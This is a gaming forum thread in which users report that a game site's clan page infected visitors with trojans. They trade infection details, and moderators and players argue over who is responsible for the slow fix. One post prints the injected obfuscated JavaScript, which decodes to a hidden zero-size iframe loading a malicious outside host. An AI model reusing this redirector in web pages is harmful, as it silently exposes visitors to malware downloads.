Concerning the clan page; PLEASE READ
Comments
-
menu.js looks clean to me, and the file obviously shouldn't differ at all unless theres something else in play.
What does everyone else see?
A lot of anti-virus systems picked up a virus when going to the clan page. Have you scanned other file? -
I know what happens.A lot of anti-virus systems picked up a virus when going to the clan page. Have you scanned other file?
People are referencing the menu.js file as a source with "poorly hidden code in it", I'm inquiring as to where this code is in the file since the copy I'm reading is very basic and clean. -
I got the virus :[ AVG said it was Zbot.g it would pop up with like 5 infected files, and suggested "healing" them but once that was done another 5 or so would pop up over and over again. I read online somewhere that zbot.g is used to allow hackers to have a backdoor into your computer so they can then download any other type of virus onto it. also the suggested way to get rid of the virus was to just do a system restore as it would continue to corrupt files just trying to use an antivirus program.
-
var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!119!119!50!46!109!99!103!114!101!103!97!114!116!46!99!111!109!47!105!110!46!99!103!105!63!50!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);
Peace of z8 java script with Trojan.JS.Redirector.kp
z8 we doing work for you!
PS Is your antivirus Alert now?
-
K well this is just a little annoying, I just spent about an hour writing out what happened in the approximate order that it happened, and when I was going to put the screenshots into the thread an add popped up from imageshack and instead of exiting out of the add, I accidentaly exited out of the page. Not going to rewrite the approximate order.
This is almost the exact problem I'm having, go to this thread to see:
http://forum.avast.com/index.php?topic=82254.0
I'm not doing the solution there because my situation is slightly different, and I could mess up my computer if I try it and it was wrong.
I got a trojan from the clan page. You can see that from this screenshot:
Originally I couldn't open up my antivirus (Microsoft Security Essentials) because the trojan/virus disabled it and kept it closed. I did scans with the updated version of malwarebytes, microsoft safety scan and nod32 online scanner:
http://www.eset.com/us/online-scanner/
http://www.malwarebytes.org/
http://www.microsoft.com/security/scanner/en-us/default.aspx
After deleting viruses then redeleting them (they just kept coming back), I restored my computer to 3 days ago, and microsoft security essentials started running again.
I did a scan with it, and it picked up a bunch of viruses and 1 trojan. The viruses were named:
virus:win32/Ramnit.AF
and the trojan was named:
Trojan:winNT/Ramnit.gen!A
I kept deleting the viruses and their locations seemed random, however the trojan was located at:
"C:\Users\basement\AppData\Local\Temp\<randomLettersHere>.sys"
I know the letters were random based off the thread I quoted above:
http://forum.avast.com/index.php?topic=82254.0
I removed my scan history and then I tried running the scan again. Before this point the "action taken" in microsoft security essentials against the viruses was "allowed", and I couldn't change it to quarantined or deleted. I'm not sure when, but at some point it changed to quarantined, but that was after I couldn't find the trojan anymore, just the viruses (the trojan wasn't popping up in the history anymore).
This is the trojan:
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3AWinNT%2FRamnit.gen!A
I tried navigating to it in CMD, however when I got to the Temp folder in "C:\Users\basement\AppData\Local\Temp\<randomLettersHere>.sys" and did a listing of the files, it didn't show up. I also tried navigating to it using the user interface, but I the furthest I get is "C:\Users\basement". AppData isn't in there in the user interface, but it is in CMD, which leads me to believe it's hidden, and I'm unsure how to unhide it in windows, plus even if I did I'm not sure if I would find the trojan.
Here's the screenshot of the history in microsoft security essentials:
It should also be noted that I'm using version 5.0 of firefox (9.0 is the newest), because my brother wants to use an addon that doesn't work in the newer versions. I'll update it after this, and that may be the reason that I got the virus from the clan page.
Near the beginning of this mess, I tried running firefox and then it would crash after about 5 seconds of being open. To correct this issue I had to run firefox in safemode, and then I could use it. I'm currently using firefox not on safemode and still have version 5.0.
I want this fixed, and I've done all that I can, short of formatting the harddrive.
If more information is required, just ask. -
-
At current time Z8 forum infected too. Like a clan page
Special for ppl who didnt read preview posts with trojan code - read posts!
For z8 admins: this is link what trojan script redirecting to:
<censored, what the hell are you thinking?>
PS Dear admins, your jobs done for you! Time rewrite scripts! -
Wow, I seriously cannot belive this problem is still ongoing after more than 24 hours.
I'm starting to suspect the person that did this is also the only person who has access to remove the code. Maybe he has been sacked, so now there is no one who has access to the file server to sort the problem out!
We have provided the specfic location of the offending script, where the hidden iframe is directing to and the files it is contained in, how hard is it to remove those lines?
Impossible it would seem
It might be a different story if it was affecting the ZP deposit page! -
The problem was thought to have been solved with the removal of affected advertisements.CyberCatUK wrote: »Wow, I seriously cannot belive this problem is still ongoing after more than 24 hours.
I'm starting to suspect the person that did this is also the only person who has access to remove the code. Maybe he has been sacked, so now there is no one who has access to the file server to sort the problem out!
We have provided the specfic location of the offending script, where the hidden iframe is directing to and the files it is contained in, how hard is it to remove those lines?
Impossible it would seem
It might be a different story if it was affecting the ZP deposit page!
The opposite has been brought to GM and technician attention and should be resolved shortly.
I love how people jump on to conspiracy theories in a heartbeat though.
Guess life isn't very interesting without them. -
Just in case no one has read the new post from [GM]Saidin yet:
http://forum.z8games.com/showpost.php?p=2677332&postcount=7Just a follow up. We took the ads off the clan page.
However we did notice that it was still giving some virus warnings. This is coming from a 3rd party ad program that we had no control over.
We're looking in to it and should have it fixed soon. -
Well I hate to be a nudge but this could have happened to any webpage on the internet.'Lefi wrote:x[;2677339']They dont give a F***!
My pc is f..ucked up now again 2 hours of pain with formating amazing JOB!
Keeping your PC safe is ultimately your responsibility.
A simple and free advertisement blocker like AdBlockPlus or probably even a half-decent antivirus stops this, as its a very crude delivery system. -
Well I hate to be a nudge but this could have happened to any webpage on the internet.
Keeping your PC safe is ultimately your responsibility.
A simple and free advertisement blocker like AdBlockPlus or probably even a half-decent antivirus stops this, as its a very crude delivery system.
I have all of that (paying for it),and interesting fact is that u first said its "FALE POSITIVE no worries" now u say its my responsibility.I know what im doing on internet and where im doing anything but when something happens on site like this and with corporation like Z8 its funny how u mods are trying to hide the truth!Thats fact u cant deny.I know u dont wanna make more hysteric ambient but lying isnt solution and u know it! -
The problem was thought to have been solved with the removal of affected advertisements.
The opposite has been brought to GM and technician attention and should be resolved shortly.
I love how people jump on to conspiracy theories in a heartbeat though.
Guess life isn't very interesting without them.
In a heartbeat? I dont know about you, buy my heart bearts faster than once in 24 hours.
The right way of dealing with the was to remove the offending script first so the site is clean to use, then you can look at the adverts which causing the issue while knowing no-one else is getting junk from this website.
Once it is confirmed to be safe you can then put your adverts back in place. Not to leave the script in place and hope you can sort out the advertisements.
At lkeast Talonblaze had the right idea.[MOD]Talonblaze wrote: »the only issue currently is that the external site is the issue. which could probably be removed until fixed at the very least. the actual CF site doesn't seem to be the source as noted above, so whatever is in that frame is causing it.
So again, why does it take more than 24 hours to remove a single line of code from a few files? -
False positive is a natural assumption.'Lefi wrote:x[;2677354']I have all of that (paying for it),and interesting fact is that u first said its "FALE POSITIVE no worries" now u say its my responsibility.I know what im doing on internet and where im doing anything but when something happens on site like this and with corporation like Z8 its funny how u mods are trying to hide the truth!Thats fact u cant deny.I know u dont wanna make more hysteric ambient but lying isnt solution and u know it!
Most advertisements drop tracking cookies which some overly-eager antiviruses pick up.
We aren't trying to hide anything, we don't know more than you and can only make more or less educated guesses.
Guess another conspiracy theorist will go to bed unhappy..CyberCatUK wrote: »In a heartbeat? I dont know about you, buy my heart bearts faster than once in 24 hours.
The right way of dealing with the was to remove the offending script first so the site is clean to use, then you can look at the adverts which causing the issue while knowing no-one else is getting junk from this website.
Once it is confirmed to be safe you can then put your adverts back in place. Not to leave the script in place and hope you can sort out the advertisements.
At lkeast Talonblaze had the right idea.
So again, why does it take more than 24 hours to remove a single line of code from a few files?
You expect me to actually give you a proper answer to why technicians I don't know on a company I'm not affiliated with aren't doing what you think they're supposed to?
I can give you my point of view, as yet another mere bystander;
Issue occurred in the middle of the night, technician time.
Issue was thought to be resolved as soon as possible, with the removal of all advertisements.
Later found that the issue wasn't resolved, technicians and GMs were again informed of the situation, and the issue should now soon be resolved in accordance with statement by Saidin.
Not sure what else you want. Not like me writing some more essays on what happened is going to change anything.
The internet is not safe, its your responsibility to at least keep your computer safe.
Deal with it. -
What are you trying to save face for? It's Z8/G4's responsibility to make sure that their webserver is secure.Well I hate to be a nudge but this could have happened to any webpage on the internet.
Keeping your PC safe is ultimately your responsibility.
It could happen to any website on the internet.
It should not happen to a website as large as Z8Games.
I still have my doubts that it was caused by ads, but whatever. -
Security is upheld by two parties.What are you trying to save face for? It's Z8/G4's responsibility to make sure that their webserver is secure.
It could happen to any website on the internet.
It should not happen to a website as large as Z8Games.
I still have my doubts that it was caused by ads, but whatever.
Provider, user.
You yourself stated that it happens. The size of the site doesn't matter.
This really doesn't interest me at all though. I use AdBlock+ which took me 5 seconds to install two years ago, so this horrible virus was of no consequence to me.
People blaming something that could happen anywhere anytime and of course does, on Z8games, just rubs me the wrong way.
The issue has been or is just about to be resolved, but of course, as soon as somethings wrong with a G4 decision or Z8 event, there is the almighty hate-choir ready to sing. -
You expect me to actually give you a proper answer to why technicians I don't know on a company I'm not affiliated with aren't doing what you think they're supposed to?
Did I say I expect you specifically to provide an answer?
Do the people who deal with it not speak english and cannot provide info on what they are doing?Issue occurred in the middle of the night, technician time.
Issue was thought to be resolved as soon as possible, with the removal of all advertisements.
It would have been resolved immediately if the offending script causing the adverts was removed first thing. Any decent website programmer would be able to sort that out.The internet is not safe, its your responsibility to at least keep your computer safe.
Deal with it.
The website is the responsibility of the z8games and they are responsible for providing a safe website for all to use. Sorry, but that statement is basicially saying we can provide any junk/viruses we want and if you get any viruses from us, then its all your fault.
When people take the time to post about the issue with the site, where the problem lies and how it can be resolved quickly, people dont expect to simply told, its your fault, deal with it.
Although not on the same scale, Can you imagine if other websites which have been attacked started blaming its users if they had details stolen.
"Well you provided us with your payment details for whatever, you should have know the internet isnt a safe place so now your details are in the hands of whoever, Tough, deal with it."
I don't think that would quite go down very well. -
Security is upheld by two parties.
Provider, user.
You yourself stated that it happens. The size of the site doesn't matter.
This really doesn't interest me at all though. I use AdBlock+ which took me 5 seconds to install two years ago, so this horrible virus was of no consequence to me.
People blaming something that could happen anywhere anytime and of course does, on Z8games, just rubs me the wrong way.
The issue has been or is just about to be resolved, but of course, as soon as somethings wrong with a G4 decision or Z8 event, there is the almighty hate-choir ready to sing.
Sure it happens. But it's quite stupid that people high up on the food chain knew about this and it STILL took over 24 hours to get fixed.
A similar thing like this happened once to a website I host for some friends. I assumed they were keeping up with software updates for the packages they were using, but apparently not, because someone got in and modified a few js files. As soon as I was notified about this, I took the site down, cleaned up the files, fixed the vulnerability in the software, and had the site back online. This took all of 15 minutes, and now I make damn sure they keep after their updates.
The size of the site does matter too. A site with as many visitors as Z8 should absolutely ensure that their software is secure, all the way from the underlying OS to the actual web-facing application, and it especially should not take 24 hours to get something like this removed when it's discovered. I don't care if the technicians are asleep, call them and wake them up.
If I was the guy responsible for site security and this happened on my watch, I'd feel like garbage. -
False positive is a natural assumption.
Most advertisements drop tracking cookies which some overly-eager antiviruses pick up.
We aren't trying to hide anything, we don't know more than you and can only make more or less educated guesses.
Guess another conspiracy theorist will go to bed unhappy..
I dont belive in any conspiracy so pls don't refer me with that! Just saying what i saw!:rolleyes: -
Sure it happens. But it's quite stupid that people high up on the food chain knew about this and it STILL took over 24 hours to get fixed.
A similar thing like this happened once to a website I host for some friends. I assumed they were keeping up with software updates for the packages they were using, but apparently not, because someone got in and modified a few js files. As soon as I was notified about this, I took the site down, cleaned up the files, fixed the vulnerability in the software, and had the site back online. This took all of 15 minutes, and now I make damn sure they keep after their updates.
The size of the site does matter too. A site with as many visitors as Z8 should absolutely ensure that their software is secure, all the way from the underlying OS to the actual web-facing application, and it especially should not take 24 hours to get something like this removed when it's discovered. I don't care if the technicians are asleep, call them and wake them up.
If I was the guy responsible for site security and this happened on my watch, I'd feel like garbage.
Same here!But thats Z8 (dont get me wrong,im saying about how long it takes to fix things!)
![[dot]](https://forum.z8games.com/uploads/customavatars/27/navatar_2942827.gif){kind=avatar}
This discussion has been closed.
Categories
- All Categories
- Z8Games
- Off-Topic - Go To Game OT Forums
- 1 Z8 Forum Discussion & Suggestions
- 16 Z8Games Announcements
- Rules & Conduct
- 5.2K CrossFire
- 951 CrossFire Announcements
- 942 Previous Announcements
- 2 Previous Patch Notes
- 1.4K Community
- 122 Modes
- 600 Suggestions
- 85 Clan Discussion and Recruitment
- 274 CF Competitive Forum
- 19 CFCL
- 26 Looking for a Team?
- 701 CrossFire Support
- 52 Suggestion
- 116 Bugs
- 28 CrossFire Guides
- 166 Technical Issues
- 47 CrossFire Off Topic